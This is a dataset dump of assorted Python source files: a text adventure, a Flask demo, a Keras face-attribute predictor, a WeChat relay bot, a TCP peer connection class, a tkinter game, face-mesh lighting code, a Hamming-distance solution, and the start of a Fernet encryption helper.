+{"seq_id":"376558597","text":"from room import Room\nfrom item import Item\nfrom player import Player\n\n# Declare all the rooms\n\nroom = {\n    'outside': Room(\"Outside Cave Entrance\",\n                    \"North of you, the cave mount beckons\"),\n\n    'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"),\n\n    'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n    'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n    'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"),\n}\n\n# Link rooms together\n#\n# Main\n#\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\nitem = {\n    'sword': Item(\"Katana Sword\", \"A Japanese sword for samurai\"),\n    'knife': Item(\"Knife\", \"Chinese dagger\"),\n    'arrow': Item(\"Bow and Arrow\", \"Bow and arrow laced with poison\"),\n    'rope': Item(\"rope\", \"rope with claws\")\n}\n\nroom['outside'].items = [\n    item['sword'],\n    item['rope']\n]\n\nroom['foyer'].items = [\n    item['knife'],\n    item['arrow'],\n]\n\nroom['overlook'].items = [\n    item['sword'],\n    item['knife'],\n]\n\nroom['narrow'].items = [\n    item['arrow'],\n    item['sword'],\n]\n\nroom['treasure'].items = [\n    item['arrow'],\n    item['sword'],\n    item['rope']\n]\n\n\nclass Adv(Player):\n    def __init__(self, name, current_room):\n        super().__init__(name, current_room)\n\n    def __str__(self):\n        return f\"Welcome, {self.name} and you are in {self.current_room} \"\n\n\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n# player_input = ''\n\n# while len(player.name) != 0:\n#     player_input = input(\"Pick your location, using 'n' for north, 's' for south, 'w' for west, 'e' for east \")\n\n# current_location = 'outside'\n# print(room[current_location])\n\nplayer = Adv('Tiger', room['outside'])\nprint(player)\nprint(player.get_player_instruction())\n\n\nwhile True:\n    direction = input(\"\\nKindly input your direction or action\")\n\n    try:\n        if direction == 'n':\n            if hasattr(player.get_current_room(), 'n_to'):\n                player.set_current_room(player.get_current_room().n_to)\n                print(player.get_current_room())\n            else:\n                print(f\"\\nSorry there is no way there \\n\")\n\n        elif direction == 's':\n            if hasattr(player.get_current_room(), 's_to'):\n                player.set_current_room(player.get_current_room().s_to)\n                print(player.get_current_room())\n            else:\n                print(f\"\\nSorry no way to the south\\n\")\n\n        elif direction == 'w':\n            if hasattr(player.get_current_room(), 'w_to'):\n                # (bug fix) move via w_to; this previously reused s_to\n                player.set_current_room(player.get_current_room().w_to)\n                print(player.get_current_room())\n            else:\n                print(f\"\\n No way to west..\\n\")\n\n        elif direction == 'e':\n            if hasattr(player.get_current_room(), 'e_to'):\n                # (bug fix) move via e_to; this previously reused s_to\n                player.set_current_room(player.get_current_room().e_to)\n                print(player.get_current_room())\n            else:\n                print(f\"\\nSorry no way to the east..closed\\n\")\n        else:\n            # (bug fix) with plain `if`s this else fired for every non-'e'\n            # input; the elif chain keeps it for unrecognized input only\n            print('Wrong direction, bye')\n    except ValueError:\n        print(player.get_player_instruction())  # (bug fix) was an invalid super reference\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"73033873","text":"'''example\nyou can use the requests library to do this operation.\n\nGET\n    http://localhost:8003/\n    http://localhost:8003/Deepak\n    http://localhost:8003/hello?name=Luis\n\nPOST\n    http://localhost:8003/messages  (port corrected to match app.run below)\n    H \"Content-type: application/json\" or \"Content-type: text/plain\"\n    body '{\"message\":\"Hello Data\"}\n\nhtml:\n\n'''\n
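\n# request sketch (editor's addition, mirroring the notes above):\n#   import requests\n#   requests.get(\"http://localhost:8003/hello\", params={\"name\": \"Luis\"})\n#   requests.post(\"http://localhost:8003/messages\", json={\"message\": \"Hello Data\"})\n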
\n#Note : Create templates folder and dump html files inside\n\nfrom flask import request,Flask,json,render_template,jsonify\n\n\napp = Flask(__name__)\n@app.route('/',methods = ['GET','POST'])\ndef index():\n    if request.method==\"GET\":return render_template('input.html')\n    elif request.method==\"POST\":\n        data = request.form\n        fname = data['fname']\n        sname = data['sname']\n        return render_template(\"output.html\", first_name=fname, sec_name=sname)\n\n@app.route(\"/<resource>/\", methods = ['GET','POST'])  # (repair) the <resource> converter was stripped during extraction; restored from the handler argument\ndef api_hello(resource):\n    if resource == \"deepak\":return render_template('deepak.html', name=\"test\")\n    elif 'name' in request.args and request.method=='GET':return 'who is ' + request.args['name']\n    elif request.method == 'POST':\n        if request.headers['Content-Type'] == 'text/plain':return \"Text Message: \" + str(request.data)\n        elif request.headers['Content-Type'] == 'application/json': return \"JSON Message: \" + json.dumps(request.json)\n    else:return \"did u mean -- 0.0.0.0:port_num/{}?name=something\".format(resource)\n\n@app.errorhandler(404)  # (fix) the handler reports 'Not Found' but was registered for 500\ndef not_found(error=None):\n    message = { 'status': 404, 'message': 'Not Found: ' + request.url}\n    resp = jsonify(message)\n    resp.status_code = 404\n    return resp\n\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=8003)","sub_path":"flask_venv/Flask_Sample.py","file_name":"Flask_Sample.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"237896199","text":"import os\r\nfrom keras.models import model_from_json\r\nfrom keras.optimizers import Adam\r\nimport pandas as pd\r\n\r\nHEIGHT = 128\r\nWIDTH = 128\r\n\r\npath_val = os.getcwd() + \"\\\\dataset\\\\\"\r\n\r\ndf=pd.read_csv(\"celeb.csv\")\r\ncolumns= [att for att in df.columns[1:]]\r\n\r\n\r\ndef load_model():\r\n    json_file = open('model.json', 'r')\r\n    loaded_model_json = json_file.read()\r\n    json_file.close()\r\n    loaded_model = model_from_json(loaded_model_json)\r\n    loaded_model.load_weights(\"best_model.h5\")\r\n    opt = Adam(lr = 0.0001)\r\n    loaded_model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n    return loaded_model\r\n\r\nmd_pred = load_model()\r\n\r\n\r\ndef predict(face):\r\n\r\n    if face[0][0][0] > 1: face = face / 255.\r\n\r\n    prediction = list(md_pred.predict(face.reshape(1, HEIGHT, WIDTH, -1))[0])\r\n    prediction = [round(v,2) for v in prediction]\r\n    output = [(columns[i] if i !=8 else \"Beard\", str(prediction[i]) if i !=8 else str(round(1 - prediction[i],2))) for i in list(range(len(prediction)))]\r\n    m_f = output[6]; del output[6]\r\n    m_f = ('M:'+str(m_f[1]),'F:'+str(round(1-float(m_f[1]),2)))\r\n    output.insert(0,m_f)\r\n    return output\r\n
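\r\n# output sketch (editor's addition): predict() returns (label, score) string\r\n# pairs with the gender pair first, e.g. [('M:0.85', 'F:0.15'), ('Smiling', '0.72'), ...]\r\n# (the attribute names come from celeb.csv, so these values are illustrative only).\r\n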
","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"180174979","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom wxbot import *\n\nclass MyWXBot(WXBot):\n    def handle_msg_all(self, msg):\n        ''' group message '''\n        if msg['msg_type_id'] == 3:\n            msg_id = msg['msg_id']\n            content = msg['content']\n            src_name = content['user']['name']\n            uid_test1 = self.get_user_id('test1')\n            uid_test2 = self.get_user_id('test2')\n            reply = 'from ' + src_name + ': '\n            ''' text message '''\n            if content['type'] == 0:\n                data = content['data']\n                reply = reply + data\n                if uid_test1 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test2)\n                if uid_test2 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test1)\n            ''' image message; animated stickers (type=6) are poorly supported --\n            forwarding may be a better route later; the system's built-in animated\n            stickers cannot be sent as images '''\n            if content['type'] == 3:\n                self.get_msg_img(msg_id)\n                path = 'temp/img_' + msg_id + '.jpg'\n                if uid_test1 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test2)\n                    self.send_img_msg_by_uid(path, uid_test2)\n                if uid_test2 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test1)\n                    self.send_img_msg_by_uid(path, uid_test1)\n            ''' voice message '''\n            if content['type'] == 4:\n                self.get_voice(msg_id)\n                path = 'temp/voice_' + msg_id + '.mp3'\n                if uid_test1 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test2)\n                    self.send_file_msg_by_uid(path, uid_test2)\n                if uid_test2 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test1)\n                    self.send_file_msg_by_uid(path, uid_test1)\n            ''' video message '''\n            if content['type'] == 13:\n                self.get_video(msg_id)\n                path = 'temp/video_' + msg_id + '.mp4'\n                if uid_test1 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test2)\n                    self.send_file_msg_by_uid(path, uid_test2)\n                if uid_test2 == msg['user']['id']:\n                    self.send_msg_by_uid(reply, uid_test1)\n                    self.send_file_msg_by_uid(path, uid_test1)\n    def schedule(self):\n        self.send_msg(u'陈晓宇', 'keepalive')\n        time.sleep(1800)\n\ndef main():\n    bot = MyWXBot()\n    bot.DEBUG = True\n    bot.conf['qr'] = 'tty'\n    bot.is_big_contact = False  # if the contact list is known to be too large to fetch, set this directly to skip the check; when it is not actually too large, this path may fail to pick up every contact\n    bot.run()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"mybot.py","file_name":"mybot.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"455047859","text":"from src.model.connection import Connection\n# from src.model.utils.observable import Observable\nfrom src.model.utils.observer import Observer\n\nimport socket as s\nfrom select import select\nfrom threading import Thread, Lock\nfrom typing import Set, Sequence, List, Tuple\nfrom time import sleep\n\n\nclass TCPIPConnection(Connection, Thread):\n    def __init__(self, inbound_port=8888):\n        Connection.__init__(self)\n        Thread.__init__(self)\n        self.__observers: Set[Observer] = set()\n        self.__inbound_port = inbound_port\n\n        self.__set_up_listen_socket()\n        self.__connected = False\n        self.__connecting = False\n        self.__connection_waiting = False\n        self.__host = None  # type: s.socket\n        self.__addr = None\n\n        self.__lock = Lock()\n        self.__running = False\n        self.__state_changed = False\n\n        self.__recv_buffer = bytearray()\n\n    def __set_up_listen_socket(self):\n        self.__listen_socket = s.socket()\n        self.__listen_socket.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1)\n        self.__listen_socket.bind(('0.0.0.0', self.__inbound_port))\n        self.__listen_socket.listen(1)\n        self.__listening = True\n\n    def open(self, host: str, port: int) -> None:\n        self.__host = s.socket()\n        self.__host.connect((host, port))\n        self.__listen_socket.close()\n        self.__listen_socket = None  # type: s.socket\n        self.__listening = False\n        self.__connecting = True\n\n    def close(self) -> None:\n        self.__connected = False\n        self.__connecting = False\n        self.__host.close()\n        self.__host = None  # type: s.socket\n        self.__addr = None\n        self.__set_up_listen_socket()\n        self.__listening = True\n\n    def send_data(self, data: bytes) -> None:\n        self.__host.send(data)\n\n    def recv_data(self) -> bytearray:\n        ret = self.__recv_buffer.copy()\n        self.__recv_buffer.clear()\n        return ret\n\n    def accept_connection(self) -> None:\n        self.__host.send(b'123')\n        self.__connecting = False\n        self.__listening = False\n        self.__connection_waiting = False\n        self.__connected = True\n\n    def 
decline_connection(self) -> None:\n self.close()\n self.__connection_waiting = False\n\n def is_open(self) -> bool:\n return self.__connected\n\n def readable(self) -> bool:\n return len(self.__recv_buffer) != 0\n\n def has_incoming_connection(self) -> bool:\n return self.__connection_waiting\n\n def get_incoming_connection_address(self) -> Tuple[str, int]:\n return self.__addr\n\n def register_observer(self, observer: Observer) -> None:\n self.__lock.acquire()\n self.__observers.add(observer)\n self.__lock.release()\n\n def remove_observer(self, observer: Observer) -> None:\n self.__lock.acquire()\n self.__observers.remove(observer)\n self.__lock.release()\n\n def notify_observers(self) -> None:\n for o in self.__observers:\n o.update()\n self.__state_changed = False\n\n def run(self) -> None:\n self.__running = True\n\n while self.__running:\n self.__lock.acquire()\n if self.__listening:\n self.__handle_listening()\n elif self.__connected:\n self.__handle_connected()\n elif self.__connecting:\n self.__handle_connecting()\n\n if self.__state_changed:\n self.notify_observers()\n\n self.__lock.release()\n\n sleep(0.05)\n\n if self.__host is not None:\n self.__host.close()\n if self.__listen_socket is not None:\n self.__listen_socket.close()\n\n def lock(self) -> None:\n self.__lock.acquire()\n\n def unlock(self) -> None:\n self.__lock.release()\n\n def stop(self) -> None:\n self.__running = False\n\n def __handle_listening(self) -> None:\n readable = self.__get_readable([self.__listen_socket])\n if readable:\n self.__host, self.__addr = self.__listen_socket.accept()\n self.__listen_socket.close()\n self.__listen_socket = None # type: s.socket\n self.__listening = False\n self.__connection_waiting = True\n self.__state_changed = True\n\n def __handle_connected(self) -> None:\n readable = self.__get_readable([self.__host])\n while readable:\n self.__state_changed = True\n data = self.__host.recv(1024)\n if not data:\n\n self.close()\n break\n\n self.__recv_buffer += data\n readable = self.__get_readable([self.__host])\n\n def __handle_connecting(self) -> None:\n readable = self.__get_readable([self.__host])\n if readable:\n response = self.__host.recv(100)\n if not response:\n self.__host.close()\n self.__host = None # type: s.socket\n self.__addr = None\n self.__set_up_listen_socket()\n else:\n self.__connecting = False\n self.__connected = True\n self.__state_changed = True\n\n def __get_readable(self, sockets: Sequence[s.socket]) -> List[s.socket]:\n return select(sockets, [], [], 0.0)[0]\n","sub_path":"src/model/tcpip_connection.py","file_name":"tcpip_connection.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637553404","text":"import tkinter\nimport keyboard\nimport time\n\ndef controllers(canvas, character):\n if keyboard.is_pressed('space') and character.hasJumped != True and character.onGround(canvas) == True:\n print(\"JUMPING\")\n character.hasJumped = True\n character.Yspeed = 20\n elif not keyboard.is_pressed('space') or character.onGround(canvas) == True:\n character.hasJumped = False\n\nclass Tk_Canvas():\n def __init__(self, width, height, background, clockSpeed):\n self.ground = 0\n self.width = width\n self.height = height\n self.background = background\n self.root = tkinter.Tk()\n self.clockSpeed = clockSpeed\n self.timeDelta = 1./clockSpeed\n self.canvas = tkinter.Canvas(self.root, width = self.width, height = self.height, background = self.background)\n 
self.canvas.pack()\n    def update(self):\n        self.canvas.update_idletasks()\n        self.canvas.update()\n    def create_rectangle(self, x0, y0, x1, y1, fill):\n        return self.canvas.create_rectangle(x0, self.height - y0, x1, self.height - y1, fill = fill)\n\nclass Main():\n    def __init__(self, meterDefinition, speed, gravity, color, canvas):\n        self.hasJumped = False\n        self.gravity = -gravity\n        self.meterDefinition = meterDefinition\n        self.Xspeed = speed\n        self.Yspeed = 0\n        self.color = color\n        self.x = 0\n        self.y = 10\n        self.body = canvas.create_rectangle(125, self.y+50, 175, self.y, self.color)\n    def move(self, canvas):\n        self.x += self.Xspeed * self.meterDefinition/canvas.clockSpeed\n        self.y += self.Yspeed * self.meterDefinition/canvas.clockSpeed\n        self.Yspeed += self.gravity\n        self.onGround(canvas)\n    def update(self, canvas):\n        canvas.canvas.delete(self.body)\n        self.body = canvas.create_rectangle(125, self.y+50, 175, self.y, self.color)\n    def onGround(self, canvas):\n        if self.y <= canvas.ground:\n            self.y = canvas.ground\n            self.Yspeed = 0\n            return True\n\ncanvas = Tk_Canvas(1280, 720, '#162838', 60)\ncharacter = Main(100, 10, 1.6, '#2E8781', canvas)\n\nwhile True:\n    time.sleep(canvas.timeDelta)\n\n    controllers(canvas, character)\n    character.move(canvas)\n    character.update(canvas)\n    canvas.update()\n\n\"\"\"\nTo do:\n- Connect to Discord F\n\nWell, keep getting familiar with the program, now that there is still little written xDD\n\"\"\"","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"423648484","text":"'''\nFunctions for lighting a mesh (changing the colors/texture of the mesh).\n1. add light to colors/texture (shade each vertex)\n2. fit light according to colors/texture & image.\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom .cython import mesh_core_cython\n\ndef get_normal(vertices, triangles):\n    ''' calculate the normal direction at each vertex\n    Args:\n        vertices: [nver, 3]\n        triangles: [ntri, 3]\n    Returns:\n        normal: [nver, 3]\n    '''\n    pt0 = vertices[triangles[:, 0], :] # [ntri, 3]\n    pt1 = vertices[triangles[:, 1], :] # [ntri, 3]\n    pt2 = vertices[triangles[:, 2], :] # [ntri, 3]\n    tri_normal = np.cross(pt0 - pt1, pt0 - pt2) # [ntri, 3]. normal of each triangle\n\n    normal = np.zeros_like(vertices, dtype = np.float32).copy() # [nver, 3]\n    # for i in range(triangles.shape[0]):\n    #     normal[triangles[i, 0], :] = normal[triangles[i, 0], :] + tri_normal[i, :]\n    #     normal[triangles[i, 1], :] = normal[triangles[i, 1], :] + tri_normal[i, :]\n    #     normal[triangles[i, 2], :] = normal[triangles[i, 2], :] + tri_normal[i, :]\n    mesh_core_cython.get_normal_core(normal, tri_normal.astype(np.float32).copy(), triangles.copy(), triangles.shape[0])\n\n    # normalize to unit length\n    mag = np.sum(normal**2, 1) # [nver]\n    zero_ind = (mag == 0)\n    mag[zero_ind] = 1\n    normal[zero_ind, 0] = np.ones((np.sum(zero_ind)))\n\n    normal = normal/np.sqrt(mag[:,np.newaxis])\n\n    return normal\n
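\n# shape sketch (editor's addition): for a single triangle,\n#   get_normal(np.eye(3, dtype=np.float32), np.array([[0, 1, 2]]))\n# would return one unit-length normal per vertex (all (1, 1, 1)/sqrt(3) here).\n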
\n# TODO: test\ndef add_light_sh(vertices, triangles, colors, sh_coeff):\n    ''' \n    In 3d face reconstruction it is usually assumed that:\n    1. The surface of the face is Lambertian (reflects only the low frequencies of lighting)\n    2. Lighting can be an arbitrary combination of point sources\n    --> can be expressed in terms of spherical harmonics (omitting the lighting coefficients)\n    I = albedo * (sh(n) x sh_coeff)\n    \n    albedo: n x 1\n    sh_coeff: 9 x 1\n    Y(n) = (1, n_x, n_y, n_z, n_xn_y, n_xn_z, n_yn_z, n_x^2 - n_y^2, 3n_z^2 - 1)': n x 9 \n    # Y(n) = (1, n_x, n_y, n_z)': n x 4\n\n    Args:\n        vertices: [nver, 3]\n        triangles: [ntri, 3]\n        colors: [nver, 3] albedo\n        sh_coeff: [9, 1] spherical harmonics coefficients\n\n    Returns:\n        lit_colors: [nver, 3]\n    '''\n    assert vertices.shape[0] == colors.shape[0]\n    nver = vertices.shape[0]\n    n = get_normal(vertices, triangles) # [nver, 3]  (bug fix: this was bound to 'normal' while the lines below use 'n')\n    sh = np.array((np.ones(nver), n[:,0], n[:,1], n[:,2], n[:,0]*n[:,1], n[:,0]*n[:,2], n[:,1]*n[:,2], n[:,0]**2 - n[:,1]**2, 3*(n[:,2]**2) - 1)) # [nver, 9]\n    ref = sh.dot(sh_coeff) #[nver, 1]\n    lit_colors = colors*ref\n    return lit_colors\n\n\ndef add_light(vertices, triangles, colors, light_positions = 0, light_intensities = 0):\n    ''' Gouraud shading. add point lights.\n    In 3d face reconstruction it is usually assumed that:\n    1. The surface of the face is Lambertian (reflects only the low frequencies of lighting)\n    2. Lighting can be an arbitrary combination of point sources\n    3. No specular (unless the skin is oily)\n\n    Ref: https://cs184.eecs.berkeley.edu/lecture/pipeline \n    Args:\n        vertices: [nver, 3]\n        triangles: [ntri, 3]\n        light_positions: [nlight, 3] \n        light_intensities: [nlight, 3]\n    Returns:\n        lit_colors: [nver, 3]\n    '''\n    nver = vertices.shape[0]\n    normals = get_normal(vertices, triangles) # [nver, 3]\n\n    # ambient\n    # La = ka*Ia\n\n    # diffuse\n    # Ld = kd*(I/r^2)max(0, nxl)\n    direction_to_lights = vertices[np.newaxis, :, :] - light_positions[:, np.newaxis, :] # [nlight, nver, 3]\n    direction_to_lights_n = np.sqrt(np.sum(direction_to_lights**2, axis = 2)) # [nlight, nver]\n    direction_to_lights = direction_to_lights/direction_to_lights_n[:, :, np.newaxis]\n    normals_dot_lights = normals[np.newaxis, :, :]*direction_to_lights # [nlight, nver, 3]\n    normals_dot_lights = np.sum(normals_dot_lights, axis = 2) # [nlight, nver]\n    diffuse_output = colors[np.newaxis, :, :]*normals_dot_lights[:, :, np.newaxis]*light_intensities[:, np.newaxis, :]\n    diffuse_output = np.sum(diffuse_output, axis = 0) # [nver, 3]\n    \n    # specular\n    # h = (v + l)/(|v + l|) bisector\n    # Ls = ks*(I/r^2)max(0, nxh)^p\n    # increasing p narrows the reflection lobe\n\n    lit_colors = diffuse_output # only the diffuse part here.\n    lit_colors = np.minimum(np.maximum(lit_colors, 0), 1)\n    return lit_colors\n
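\n# usage sketch (editor's addition): a single white point light above the mesh,\n#   light_pos = np.array([[0, 0, 300]], dtype=np.float32)\n#   light_int = np.ones((1, 3), dtype=np.float32)\n#   lit = add_light(vertices, triangles, colors, light_pos, light_int)\n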
\n\n## TODO: estimate light (sh coeff)\n## -------------------------------- estimation; cannot be used yet. \ndef fit_light(image, vertices, colors, triangles, vis_ind, lamb = 10, max_iter = 3):\n    texture = colors  # (bug fix) the body below referred to an undefined name 'texture'\n    [h, w, c] = image.shape\n\n    # surface normal\n    norm = get_normal(vertices, triangles)\n    \n    nver = vertices.shape[1]\n\n    # vertices --> corresponding image pixel\n    pt2d = vertices[:2, :]\n\n    pt2d[0,:] = np.minimum(np.maximum(pt2d[0,:], 0), w - 1)\n    pt2d[1,:] = np.minimum(np.maximum(pt2d[1,:], 0), h - 1)\n    pt2d = np.round(pt2d).astype(np.int32) # 2 x nver\n\n    image_pixel = image[pt2d[1,:], pt2d[0,:], :] # nver x 3\n    image_pixel = image_pixel.T # 3 x nver\n\n    # vertices --> corresponding mean texture pixel with illumination\n    # Spherical Harmonic Basis\n    harmonic_dim = 9\n    nx = norm[0,:]\n    ny = norm[1,:]\n    nz = norm[2,:]\n    harmonic = np.zeros((nver, harmonic_dim))\n\n    pi = np.pi\n    harmonic[:,0] = np.sqrt(1/(4*pi)) * np.ones((nver,))\n    harmonic[:,1] = np.sqrt(3/(4*pi)) * nx\n    harmonic[:,2] = np.sqrt(3/(4*pi)) * ny\n    harmonic[:,3] = np.sqrt(3/(4*pi)) * nz\n    harmonic[:,4] = 1/2. * np.sqrt(3/(4*pi)) * (2*nz**2 - nx**2 - ny**2)\n    harmonic[:,5] = 3 * np.sqrt(5/(12*pi)) * (ny*nz)\n    harmonic[:,6] = 3 * np.sqrt(5/(12*pi)) * (nx*nz)\n    harmonic[:,7] = 3 * np.sqrt(5/(12*pi)) * (nx*ny)\n    harmonic[:,8] = 3/2. * np.sqrt(5/(12*pi)) * (nx*nx - ny*ny)\n    \n    '''\n    I' = sum(albedo * lj * hj) j = 0:9 (albedo = tex)\n    set A = albedo*h (n x 9)\n        alpha = lj (9 x 1)\n        Y = I (n x 1)\n    Y' = A.dot(alpha)\n\n    opt function:\n        ||Y - A*alpha||^2 + lambda*(alpha'*alpha)\n    setting the gradient to zero:\n        -A'*(Y - A*alpha) + lambda*alpha = 0\n    ==>\n        (A'*A + lambda*I)*alpha = A'*Y\n        left: 9 x 9\n        right: 9 x 1\n    '''\n    n_vis_ind = len(vis_ind)\n    n = n_vis_ind*c\n\n    Y = np.zeros((n, 1))\n    A = np.zeros((n, 9))\n    light = np.zeros((3, 1))\n\n    for k in range(c):\n        Y[k*n_vis_ind:(k+1)*n_vis_ind, :] = image_pixel[k, vis_ind][:, np.newaxis]\n        A[k*n_vis_ind:(k+1)*n_vis_ind, :] = texture[k, vis_ind][:, np.newaxis] * harmonic[vis_ind, :]\n        Ac = texture[k, vis_ind][:, np.newaxis]\n        Yc = image_pixel[k, vis_ind][:, np.newaxis]\n        light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))\n\n    for i in range(max_iter):\n\n        Yc = Y.copy()\n        for k in range(c):\n            Yc[k*n_vis_ind:(k+1)*n_vis_ind, :] /= light[k]\n\n        # update alpha\n        equation_left = np.dot(A.T, A) + lamb*np.eye(harmonic_dim)  # the + lambda*I term is the ridge penalty from the objective above\n        equation_right = np.dot(A.T, Yc) \n        alpha = np.dot(np.linalg.inv(equation_left), equation_right)\n\n        # update light\n        for k in range(c):\n            Ac = A[k*n_vis_ind:(k+1)*n_vis_ind, :].dot(alpha)\n            Yc = Y[k*n_vis_ind:(k+1)*n_vis_ind, :]\n            light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))\n\n    appearance = np.zeros_like(texture)\n    for k in range(c):\n        tmp = np.dot(harmonic*texture[k, :][:, np.newaxis], alpha*light[k])\n        appearance[k,:] = tmp.T\n\n    appearance = np.minimum(np.maximum(appearance, 0), 1)\n\n    return appearance\n\n","sub_path":"python-package/insightface/thirdparty/face3d/mesh/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"286487356","text":"\"\"\"\nThe Hamming distance between two integers is the number of positions at which the\ncorresponding bits are different.\n\nNow your job is to find the total Hamming distance between all pairs of the given numbers.\n\"\"\"\nclass Solution(object):\n    def totalHammingDistance(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        # TLE. Naive solution\n
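        # worked check (editor's addition): hammingDistance(1, 4) == 2,\n        # since 001 ^ 100 = 101 has two differing bit positions.\n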
        if len(nums) == 2:\n            return self.hammingDistance(nums[0], nums[1])\n\n        dist = 0\n        for i in range(len(nums)-1):\n            for j in range(i+1, len(nums)):\n                if nums[i] != nums[j]:\n                    dist += self.hammingDistance(nums[i], nums[j])\n        return dist\n\n    def hammingDistance(self, x, y):\n        z = x ^ y\n        res = 0\n        while z > 0:\n            res += z % 2\n            z >>= 1\n        return res\n\n    def totalHammingDistance2(self, nums):\n        if len(nums) < 2: return 0\n        res = 0\n        while True:\n            zeroOne = [0, 0]\n            for i in range(len(nums)):\n                zeroOne[nums[i] % 2] += 1\n                nums[i] = nums[i] >> 1\n            res += zeroOne[0] * zeroOne[1]\n            if not any(nums):\n                return res\n\n    def totalHammingDistance3(self, nums):\n        \"\"\"\n        Total hamming distance for the i-th bit =\n        (the number of zeros in the i-th position) *\n        (the number of ones in the i-th position).\n        \"\"\"\n        bits = [[0, 0] for _ in range(32)]\n        for x in nums:\n            for i in range(32):\n                bits[i][x % 2] += 1\n                x //= 2\n        return sum(x * y for x, y in bits)\n\n# nums = [4,14,2]\n# nums = [1337,7331]\nnums = [6,1,8,6,8] # 22\nprint(Solution().totalHammingDistance3(nums))\n\n\"\"\"\nThe total Hamming distance is constructed bit by bit in this approach.\n\nTake a series of numbers: a1, a2, a3,..., an\nand think about the Least Significant Bit (LSB) of each a(k) (1 ≤ k ≤ n).\n\nHow much Hamming distance do the LSBs add to the total?\nIf a pair of numbers has the same LSB, the pair contributes 0 to the total.\nIf a pair of numbers has different LSBs, the pair contributes 1.\n\nAmong a1, a2, a3,..., a(n), say p numbers have 0 as their LSB (put in set M)\nand q numbers have 1 as their LSB (put in set N).\n\nThere are 2 situations:\nSituation 1. If both numbers of a pair come from M (or both from N), the total gains 0.\nSituation 2. If one number of a pair comes from M and the other from N, the total gains 1.\n\nSince Situation 1 adds NOTHING to the total, we only need to consider Situation 2.\n\nHow many pairs are there in Situation 2?\nWe choose 1 number from M (p possibilities) and 1 number from N (q possibilities).\n\nThe total number of such pairs is p × q = pq, which means\nthe total Hamming distance gains pq from the LSB.\n\nIf we remove the LSB of all numbers (logical right shift), the same idea can be\napplied again and again until all numbers become zero.\n\"\"\"","sub_path":"477TotalHammingDist.py","file_name":"477TotalHammingDist.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"259821934","text":"from cryptography.fernet import Fernet\nfrom pymongo import MongoClient\n\n#---------------------------Encrypt-----------------------------------\ndef encriptar(message):\n    file = open('key.key','rb')\n    key = file.read()\n    file.close()\n\n    encoded = message.encode()\n\n    f = Fernet(key)\n    encrypted = f.encrypt(encoded)\n\n    return encrypted\n
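\n# roundtrip sketch (editor's addition; assumes key.key already holds a Fernet key):\n#   token = encriptar(\"hunter2\")  # encrypted bytes\n#   Fernet(open('key.key','rb').read()).decrypt(token).decode()  # -> \"hunter2\"\n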
